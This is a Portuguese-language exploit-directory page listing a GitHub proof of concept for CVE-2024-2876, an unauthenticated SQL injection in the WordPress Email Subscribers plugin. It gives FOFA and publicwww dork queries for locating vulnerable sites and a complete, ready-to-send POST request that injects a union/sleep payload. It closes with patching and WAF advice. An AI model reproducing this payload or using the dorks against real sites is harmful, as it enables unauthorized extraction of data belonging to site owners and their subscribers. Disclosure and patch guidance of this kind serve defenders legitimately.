Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-2876 — Prova de conceito para CVE-2024-2876, uma injeção SQL não autenticada no plugin WordPress Email Subscribers, com consultas dork e uma requisição de exploit funcional. | Kitploit
Ferramentas/GitHubGitHub/babydessy/cve-2024-2876
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubbabydessy/cve-2024-2876

CVE-2024-2876

Prova de conceito para CVE-2024-2876, uma injeção SQL não autenticada no plugin WordPress Email Subscribers, com consultas dork e uma requisição de exploit funcional.

Ver Repositório
11há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-2876

#Descrição Da Vulnerabilidade: O plugin Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce para WordPress é vulnerável a SQL Injection através da função 'run' da classe 'IG_ES_Subscribers_Query' em todas as versões até, e incluindo, a 5.7.14 devido a escape insuficiente no parâmetro fornecido pelo usuário e falta de preparação suficiente na consulta SQL existente. Isso possibilita que atacantes não autenticados anexem consultas SQL adicionais em consultas já existentes que podem ser usadas para extrair informações sensíveis do banco de dados.

#Dork: 1- FOFA : body="/wp-content/plugins/email-subscribers/" 2- publicwww : "/wp-content/plugins/email-subscribers/"

#POC: POST /wp-admin/admin-post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

#Youtube POC: https://www.youtube.com/watch?v=eDEGt_yXyvE

#Como corrigir ? Como todas as versões até a 5.7.14 foram detectadas com a CVE, recomenda-se que os usuários atualizem o plugin Email Subscribers by Icegram Express para a versão 5.7.15 (ou a versão mais recente 5.7.19). Os usuários do Patchstack têm a opção de habilitar atualizações automáticas especificamente para plugins vulneráveis. Implemente uma solução WAF/WAAP como uma camada adicional de proteção. A vantagem de tais soluções é que, mesmo que a vulnerabilidade seja nova e desconhecida (0-day), ela ainda pode prevenir ataques detectando padrões e técnicas de exploração.

#Recurso: https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/

Baixar ferramenta